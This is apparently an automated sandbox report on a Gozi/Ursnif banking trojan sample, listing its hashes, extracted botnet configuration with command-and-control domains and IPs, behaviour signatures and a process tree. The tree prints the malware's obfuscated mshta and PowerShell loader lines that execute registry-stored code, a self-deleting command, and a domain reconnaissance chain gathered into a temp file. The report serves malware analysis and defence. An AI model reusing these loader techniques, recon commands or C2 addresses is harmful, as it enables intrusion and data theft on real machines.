gozi | 112b84b09d2051376879f697f03190240132b87bbac0d069175bd3039d492f56

Resubmissions

25/12/2022, 16:04

221225-th4nmseg91 10

25/12/2022, 09:43

221225-lqbntsee3v 10

Analysis

max time kernel
150s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
25/12/2022, 09:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ursnif.exe
Size

332KB
MD5

a03b2c0e5af189c08c70a6532ab48300
SHA1

b4d68c7f0bc9a592f500de86e0125dd1e2a36089
SHA256

112b84b09d2051376879f697f03190240132b87bbac0d069175bd3039d492f56
SHA512

c77f652b8300763e9ebd5c93b85bfd5c8ef904c03f0ecc1fac9128fea211058980402ca511d71fa07d95fedb74abc8658a1bfc636f749c2022e64e96d427f3a7
SSDEEP

6144:4i7CLqelbeSO8XNHlreeOxeZ61hJFIJfVAVrwU+:jGGWbRNHlKel6PHgtyQ

Score

10^/10

gozi 3000 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

3000

trackingg-protectioon.cdn4.mozilla.net

185.189.151.38

31.214.157.31

protectioon.cdn4.mozilla.net

9185.212.47.59

194.76.224.95

194.76.227.159

91.241.93.111

Attributes

base_path
/fonts/
build
250249
exe_type
loader
extension
.bak
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

3000

protectioon.cdn4.mozilla.net

194.76.224.95

194.76.227.159

91.241.93.111

31.214.157.31

9185.212.47.59

trackingg-protectioon.cdn4.mozilla.net

185.189.151.38

Attributes

base_path
/fonts/
build
250249
exe_type
worker
extension
.bak
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 312 set thread context of 2640	312	powershell.exe	46
PID 2640 set thread context of 3436	2640	Explorer.EXE	43
PID 2640 set thread context of 3696	2640	Explorer.EXE	41
PID 2640 set thread context of 4992	2640	Explorer.EXE	95
PID 4992 set thread context of 60	4992	cmd.exe	97
PID 2640 set thread context of 3420	2640	Explorer.EXE	103

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2692	2276	WerFault.exe	78

Discovers systems in the same network 1 TTPs 3 IoCs

discovery

Remote System Discovery

T1018

pid	Process
1288	net.exe
4360	net.exe
2248	net.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
1780	tasklist.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5060	systeminfo.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
60	PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
60	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2276	ursnif.exe
2276	ursnif.exe
312	powershell.exe
312	powershell.exe
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
312	powershell.exe
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
4992	cmd.exe
2640	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 52 IoCs

description	pid	Process
Token: SeDebugPrivilege	312	powershell.exe
Token: SeShutdownPrivilege	2640	Explorer.EXE
Token: SeCreatePagefilePrivilege	2640	Explorer.EXE
Token: SeShutdownPrivilege	2640	Explorer.EXE
Token: SeCreatePagefilePrivilege	2640	Explorer.EXE
Token: SeShutdownPrivilege	2640	Explorer.EXE
Token: SeCreatePagefilePrivilege	2640	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	4676	WMIC.exe
Token: SeSecurityPrivilege	4676	WMIC.exe
Token: SeTakeOwnershipPrivilege	4676	WMIC.exe
Token: SeLoadDriverPrivilege	4676	WMIC.exe
Token: SeSystemProfilePrivilege	4676	WMIC.exe
Token: SeSystemtimePrivilege	4676	WMIC.exe
Token: SeProfSingleProcessPrivilege	4676	WMIC.exe
Token: SeIncBasePriorityPrivilege	4676	WMIC.exe
Token: SeCreatePagefilePrivilege	4676	WMIC.exe
Token: SeBackupPrivilege	4676	WMIC.exe
Token: SeRestorePrivilege	4676	WMIC.exe
Token: SeShutdownPrivilege	4676	WMIC.exe
Token: SeDebugPrivilege	4676	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4676	WMIC.exe
Token: SeRemoteShutdownPrivilege	4676	WMIC.exe
Token: SeUndockPrivilege	4676	WMIC.exe
Token: SeManageVolumePrivilege	4676	WMIC.exe
Token: 33	4676	WMIC.exe
Token: 34	4676	WMIC.exe
Token: 35	4676	WMIC.exe
Token: 36	4676	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4676	WMIC.exe
Token: SeSecurityPrivilege	4676	WMIC.exe
Token: SeTakeOwnershipPrivilege	4676	WMIC.exe
Token: SeLoadDriverPrivilege	4676	WMIC.exe
Token: SeSystemProfilePrivilege	4676	WMIC.exe
Token: SeSystemtimePrivilege	4676	WMIC.exe
Token: SeProfSingleProcessPrivilege	4676	WMIC.exe
Token: SeIncBasePriorityPrivilege	4676	WMIC.exe
Token: SeCreatePagefilePrivilege	4676	WMIC.exe
Token: SeBackupPrivilege	4676	WMIC.exe
Token: SeRestorePrivilege	4676	WMIC.exe
Token: SeShutdownPrivilege	4676	WMIC.exe
Token: SeDebugPrivilege	4676	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4676	WMIC.exe
Token: SeRemoteShutdownPrivilege	4676	WMIC.exe
Token: SeUndockPrivilege	4676	WMIC.exe
Token: SeManageVolumePrivilege	4676	WMIC.exe
Token: 33	4676	WMIC.exe
Token: 34	4676	WMIC.exe
Token: 35	4676	WMIC.exe
Token: 36	4676	WMIC.exe
Token: SeShutdownPrivilege	2640	Explorer.EXE
Token: SeCreatePagefilePrivilege	2640	Explorer.EXE
Token: SeDebugPrivilege	1780	tasklist.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2640	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3132 wrote to memory of 312	3132	mshta.exe	89
PID 3132 wrote to memory of 312	3132	mshta.exe	89
PID 312 wrote to memory of 4728	312	powershell.exe	91
PID 312 wrote to memory of 4728	312	powershell.exe	91
PID 4728 wrote to memory of 4384	4728	csc.exe	92
PID 4728 wrote to memory of 4384	4728	csc.exe	92
PID 312 wrote to memory of 3388	312	powershell.exe	93
PID 312 wrote to memory of 3388	312	powershell.exe	93
PID 3388 wrote to memory of 1340	3388	csc.exe	94
PID 3388 wrote to memory of 1340	3388	csc.exe	94
PID 312 wrote to memory of 2640	312	powershell.exe	46
PID 312 wrote to memory of 2640	312	powershell.exe	46
PID 312 wrote to memory of 2640	312	powershell.exe	46
PID 312 wrote to memory of 2640	312	powershell.exe	46
PID 2640 wrote to memory of 4992	2640	Explorer.EXE	95
PID 2640 wrote to memory of 4992	2640	Explorer.EXE	95
PID 2640 wrote to memory of 4992	2640	Explorer.EXE	95
PID 2640 wrote to memory of 3436	2640	Explorer.EXE	43
PID 2640 wrote to memory of 3436	2640	Explorer.EXE	43
PID 2640 wrote to memory of 3436	2640	Explorer.EXE	43
PID 2640 wrote to memory of 3436	2640	Explorer.EXE	43
PID 2640 wrote to memory of 3696	2640	Explorer.EXE	41
PID 2640 wrote to memory of 3696	2640	Explorer.EXE	41
PID 2640 wrote to memory of 3696	2640	Explorer.EXE	41
PID 2640 wrote to memory of 3696	2640	Explorer.EXE	41
PID 2640 wrote to memory of 4992	2640	Explorer.EXE	95
PID 2640 wrote to memory of 4992	2640	Explorer.EXE	95
PID 4992 wrote to memory of 60	4992	cmd.exe	97
PID 4992 wrote to memory of 60	4992	cmd.exe	97
PID 4992 wrote to memory of 60	4992	cmd.exe	97
PID 4992 wrote to memory of 60	4992	cmd.exe	97
PID 4992 wrote to memory of 60	4992	cmd.exe	97
PID 2640 wrote to memory of 4584	2640	Explorer.EXE	101
PID 2640 wrote to memory of 4584	2640	Explorer.EXE	101
PID 2640 wrote to memory of 3420	2640	Explorer.EXE	103
PID 2640 wrote to memory of 3420	2640	Explorer.EXE	103
PID 2640 wrote to memory of 3420	2640	Explorer.EXE	103
PID 2640 wrote to memory of 3420	2640	Explorer.EXE	103
PID 4584 wrote to memory of 4676	4584	cmd.exe	105
PID 4584 wrote to memory of 4676	4584	cmd.exe	105
PID 4584 wrote to memory of 4100	4584	cmd.exe	106
PID 4584 wrote to memory of 4100	4584	cmd.exe	106
PID 2640 wrote to memory of 3420	2640	Explorer.EXE	103
PID 2640 wrote to memory of 3420	2640	Explorer.EXE	103
PID 2640 wrote to memory of 3984	2640	Explorer.EXE	107
PID 2640 wrote to memory of 3984	2640	Explorer.EXE	107
PID 2640 wrote to memory of 2208	2640	Explorer.EXE	109
PID 2640 wrote to memory of 2208	2640	Explorer.EXE	109
PID 2208 wrote to memory of 5060	2208	cmd.exe	111
PID 2208 wrote to memory of 5060	2208	cmd.exe	111
PID 2640 wrote to memory of 5020	2640	Explorer.EXE	113
PID 2640 wrote to memory of 5020	2640	Explorer.EXE	113
PID 2640 wrote to memory of 3844	2640	Explorer.EXE	115
PID 2640 wrote to memory of 3844	2640	Explorer.EXE	115
PID 3844 wrote to memory of 1288	3844	cmd.exe	117
PID 3844 wrote to memory of 1288	3844	cmd.exe	117
PID 2640 wrote to memory of 2280	2640	Explorer.EXE	118
PID 2640 wrote to memory of 2280	2640	Explorer.EXE	118
PID 2640 wrote to memory of 3284	2640	Explorer.EXE	120
PID 2640 wrote to memory of 3284	2640	Explorer.EXE	120
PID 3284 wrote to memory of 3448	3284	cmd.exe	122
PID 3284 wrote to memory of 3448	3284	cmd.exe	122
PID 2640 wrote to memory of 4288	2640	Explorer.EXE	123
PID 2640 wrote to memory of 4288	2640	Explorer.EXE	123

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3696

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3436

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2640
- C:\Users\Admin\AppData\Local\Temp\ursnif.exe
  "C:\Users\Admin\AppData\Local\Temp\ursnif.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2276
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2276 -s 1392
    3⤵
    - Program crash
    PID:2692
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Pwj1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pwj1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\7088CE6E-0F81-227B-19A4-B3765D18970A\\\MaskCollision'));if(!window.flag)close()</script>"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3132
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xgmeex -value gp; new-alias -name iskcatp -value iex; iskcatp ([System.Text.Encoding]::ASCII.GetString((xgmeex "HKCU:Software\AppDataLow\Software\Microsoft\7088CE6E-0F81-227B-19A4-B3765D18970A").TextValue))
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:312
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pbke5tvq\pbke5tvq.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4728
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE0CB.tmp" "c:\Users\Admin\AppData\Local\Temp\pbke5tvq\CSCAFC2BF3562C04432AC822C3519C5BA5D.TMP"
        5⤵
        
        PID:4384
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\awztitvg\awztitvg.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3388
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE222.tmp" "c:\Users\Admin\AppData\Local\Temp\awztitvg\CSCC8BB36053FFD4941B4AF95EA81D1E2B6.TMP"
        5⤵
        
        PID:1340
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\ursnif.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:4992
- - C:\Windows\system32\PING.EXE
    ping localhost -n 5
    3⤵
    - Runs ping.exe
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:60
- C:\Windows\system32\cmd.exe
  cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4584
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get domain
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4676
- - C:\Windows\system32\more.com
    more
    3⤵
    PID:4100
- C:\Windows\syswow64\cmd.exe
  "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
  2⤵
  PID:3420
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:3984
- C:\Windows\system32\cmd.exe
  cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2208
- - C:\Windows\system32\systeminfo.exe
    systeminfo.exe
    3⤵
    - Gathers system information
    PID:5060
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:5020
- C:\Windows\system32\cmd.exe
  cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3844
- - C:\Windows\system32\net.exe
    net view
    3⤵
    - Discovers systems in the same network
    PID:1288
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:2280
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3284
- - C:\Windows\system32\nslookup.exe
    nslookup 127.0.0.1
    3⤵
    PID:3448
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:4288
- C:\Windows\system32\cmd.exe
  cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:4944
- - C:\Windows\system32\tasklist.exe
    tasklist.exe /SVC
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:1780
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:4796
- C:\Windows\system32\cmd.exe
  cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:3052
- - C:\Windows\system32\driverquery.exe
    driverquery.exe
    3⤵
    PID:4968
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:1416
- C:\Windows\system32\cmd.exe
  cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:2388
- - C:\Windows\system32\reg.exe
    reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
    3⤵
    PID:2504
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:3216
- C:\Windows\system32\cmd.exe
  cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:116
- - C:\Windows\system32\net.exe
    net config workstation
    3⤵
    PID:2736
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 config workstation
      4⤵
      PID:3656
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:4996
- C:\Windows\system32\cmd.exe
  cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:4328
- - C:\Windows\system32\nltest.exe
    nltest /domain_trusts
    3⤵
    PID:8
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:2608
- C:\Windows\system32\cmd.exe
  cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:3100
- - C:\Windows\system32\nltest.exe
    nltest /domain_trusts /all_trusts
    3⤵
    PID:4204
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:3808
- C:\Windows\system32\cmd.exe
  cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:2968
- - C:\Windows\system32\net.exe
    net view /all /domain
    3⤵
    - Discovers systems in the same network
    PID:4360
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:2784
- C:\Windows\system32\cmd.exe
  cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:3624
- - C:\Windows\system32\net.exe
    net view /all
    3⤵
    - Discovers systems in the same network
    PID:2248
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:60
- C:\Windows\system32\cmd.exe
  cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\9032.bin1 > C:\Users\Admin\AppData\Local\Temp\9032.bin & del C:\Users\Admin\AppData\Local\Temp\9032.bin1"
  2⤵
  PID:4572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2276 -ip 2276
1⤵
PID:4496

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9032.bin

Filesize
64KB

MD5
c70d44d634fde7146ed82c4fcdc6b57b

SHA1
da9c64da2dd941b959970903e85d93979c80e9e9

SHA256
3ec6ba37a3d2e6591f075c28dedd61ad72770fe44bcecc16938dfdb479b15825

SHA512
75ba83cc591532870bea0cf6ab9ed6eaed43e83489de7dfe1d8d46da314191a4521458d3f5927da353c45498f0da98d8553f861547d5289923b96d68c7c458bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\9032.bin1

Filesize
44B

MD5
f7aea2435aa888b709ca20f816c33bfd

SHA1
38717c9a73b5f8bd399839cbe0aa57518427e758

SHA256
f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5

SHA512
1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

Download Submit
C:\Users\Admin\AppData\Local\Temp\9032.bin1

Filesize
2KB

MD5
c1675b4ca50b365284ae8d5c167cace0

SHA1
11bed9bd80a534849c7973a3088e8d419eb16bce

SHA256
f0d02bbe0766981c5f29bcbb78064aacaca9a4c520df9e87d135d2e7e9bc2ea3

SHA512
d0b3e7f90d71c76ca7e0200f36a59f784477a881a5dd63e0daa5e6f4f3cd7fa443fcae3625990fb5a3180ae6edf7b84dc847ed4fcdc964c32ae84dcc44d587c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\9032.bin1

Filesize
2KB

MD5
c1675b4ca50b365284ae8d5c167cace0

SHA1
11bed9bd80a534849c7973a3088e8d419eb16bce

SHA256
f0d02bbe0766981c5f29bcbb78064aacaca9a4c520df9e87d135d2e7e9bc2ea3

SHA512
d0b3e7f90d71c76ca7e0200f36a59f784477a881a5dd63e0daa5e6f4f3cd7fa443fcae3625990fb5a3180ae6edf7b84dc847ed4fcdc964c32ae84dcc44d587c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\9032.bin1

Filesize
2KB

MD5
2c0cb8106a2335103fe4319173a231e8

SHA1
601a2670a8622bdae9142fe1f856ea4c376f0622

SHA256
32eddd57435931c730a369b6f1094b556dd1ee3c468150f455cd6ad0af280c67

SHA512
481c4172f3d87681790be97e5afd0a0b50c8f74500f00e51a2512de602272962a38ed94dda8415876611ec2982a5a344de8688830fbd6df184838cce11022a46

Download Submit
C:\Users\Admin\AppData\Local\Temp\9032.bin1

Filesize
2KB

MD5
f93f8b6a04e6b182c263b5fcd0b94b6d

SHA1
019b925ed9ad136e4c9925bd96c28bd97cc1639f

SHA256
6393735eb7e7a9f1199f4abb8df7318b10fa57f64c4b2eed46ea8578352bca26

SHA512
8526f22f31bbb79895598d3fc3dbb84c235bb83a7067a15507bd82fe3293637c859217d5d3a24536e8425b4f0414ff8e8df60ff0718777ce9f3e8927dbb443ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\9032.bin1

Filesize
2KB

MD5
1603d6cb6e207de037ed63653f48f2f9

SHA1
5651dee36b3dcedfc40eac541217a8d941455161

SHA256
578715a11c89c0cf639955117c7a3f0362751b93c384df0be3278a7863492147

SHA512
13afcff26db37f5f3c6881167e09bcc8fa8aab1cdde318975c9157dd3e0d8aa386987bc540cc83b7c8d1a45bc548a42f700c7cf274c4e154a654a8772be87381

Download Submit
C:\Users\Admin\AppData\Local\Temp\9032.bin1

Filesize
9KB

MD5
497d07ea54934c3521330244bb32f847

SHA1
cfa3737ccd6055a8af0845e762c6f350256bb99a

SHA256
a38ed26a793471c271a73d71f94a70057273327be91faad2b2f8bce7a0a9b42b

SHA512
464754585de88fa2a1133ead135af2bc1f7f2ebbb3cd8eca18b384d4e86043e2e1f29817edefd880d428ebcaa15c1d61dbdb5ad7b91eedf5d2b88aeb80fa779d

Download Submit
C:\Users\Admin\AppData\Local\Temp\9032.bin1

Filesize
9KB

MD5
3e544d603effe07a36f432a3e0b20d0d

SHA1
72824f648a560a26bf46d20ad33ee508a2f3f0ba

SHA256
674f31141474fde0f498f3be0e17803e971357c5491efdcdc900a7e120393a1d

SHA512
978cd1dfbe5a0e01109bdebe0ea15ca689f975200924c7013046c04f5ef3fcbeff113f77440e2c80eb785a03697953edb70b5872a5fbdb66744fc017c4817f4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\9032.bin1

Filesize
35KB

MD5
602fa7c238a65134201aaa27a28d5da1

SHA1
257623b2d16a0ed96e6e7b61d2b0eeaeff5d8cfa

SHA256
1a835fb09a7d2d79c194243825f01cf293a20c7053ea34a3fdeb7d3520603b11

SHA512
4ee6067af3c2a32a36cfe084ce9b0153731ea502cb2f539813fc2a3c6c826eaafe1ddda51e175c14021e15ff768928740cb9df99c770a8dbcc58e556b2a2a823

Download Submit
C:\Users\Admin\AppData\Local\Temp\9032.bin1

Filesize
35KB

MD5
de0ce72483300ab393e1eb95c769fe39

SHA1
6d632b14e6d9e92b150061444b6d8a993002e210

SHA256
aad220cd567140e128f0008a7b08dd645a4329f35103a458292dad4268c59a4d

SHA512
cb5acefa8305ce1a4fbb0763db309d8c885a684315d7b0abdc400d004afe2186289a6ad0e79e5f397b13d907ff61f22254b7f549a5a7cc396defbb419431ee1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\9032.bin1

Filesize
64KB

MD5
aa72b74ea388350c38374e54c3869441

SHA1
55d5b5a9f0c5eaf3edd98ecef40a05ef0fdc34bc

SHA256
3e3dd170ed0460a93038ab1837b015df9cd44fc1194ce8771f7709bcf4a099b0

SHA512
f4bae2fd32ef703b4a70b5abea8dd66a4665ac855ed7dc1027e7d2806a4309e440efcf61308b94984d05223959e54b5aa1d282eed142f546b1175e604fc4d498

Download Submit
C:\Users\Admin\AppData\Local\Temp\9032.bin1

Filesize
64KB

MD5
aa72b74ea388350c38374e54c3869441

SHA1
55d5b5a9f0c5eaf3edd98ecef40a05ef0fdc34bc

SHA256
3e3dd170ed0460a93038ab1837b015df9cd44fc1194ce8771f7709bcf4a099b0

SHA512
f4bae2fd32ef703b4a70b5abea8dd66a4665ac855ed7dc1027e7d2806a4309e440efcf61308b94984d05223959e54b5aa1d282eed142f546b1175e604fc4d498

Download Submit
C:\Users\Admin\AppData\Local\Temp\9032.bin1

Filesize
64KB

MD5
3f20e3b56281158711d5ad6f410273f0

SHA1
d32d72cd4deeeea0d8c006b8e4245b15b42b3a19

SHA256
c2949b09d46d1c0586738e196eb558ceda8549889eb4ef0b6f2c200729e92b23

SHA512
b819b3771b39bdcdb9e13df526960e46a995daa23a552f8cb090ad48b1c231ab462ca76fb721894030771b22f2d661a5e9ab12fb916d80d77c34892e0589d965

Download Submit
C:\Users\Admin\AppData\Local\Temp\9032.bin1

Filesize
64KB

MD5
62f315f60bc60c7d37bdc5ec7ff666f7

SHA1
93d6e127a2c0a04b8c5af61153fc36f37eb5ea57

SHA256
3f0d1225864e5f25ffbfd1e624df3fae3f19c01e023815d48ee894641e83d01f

SHA512
c1aabd2d48b1ba86406de3f63a72afe5a9e463d5c6d5d3c30d9c35b25c3802f8694b8eaf07ec679375d369ba9ae5af27815f11a357e8c8c353e0f9bb5c01d013

Download Submit
C:\Users\Admin\AppData\Local\Temp\9032.bin1

Filesize
64KB

MD5
0e73a42fa7ab1d3e4c25d76913d2968a

SHA1
00ea3fde9b548e930de008ff6b8c77a3c9af8605

SHA256
944840ded954bc661281986c40156e64d37e35226bb27ee857cdda73fe4b8dd2

SHA512
0d6a4224ab317d6e5faaf2428cd524eeb3da27363c645116ebf072c49462bf2187fcd5d37ce7797a239abef4833011fe53f476486bb159c9ead68889379c16de

Download Submit
C:\Users\Admin\AppData\Local\Temp\9032.bin1

Filesize
64KB

MD5
1f156fe22f08b1b60985f5ee3f6a7537

SHA1
bfa9c25a9b7d1d083634c0259fb2ff6540f000b7

SHA256
d5559c3c2e33b9b9a938581432785e71111e5e7033da58e2155f4bad5f9ae9dc

SHA512
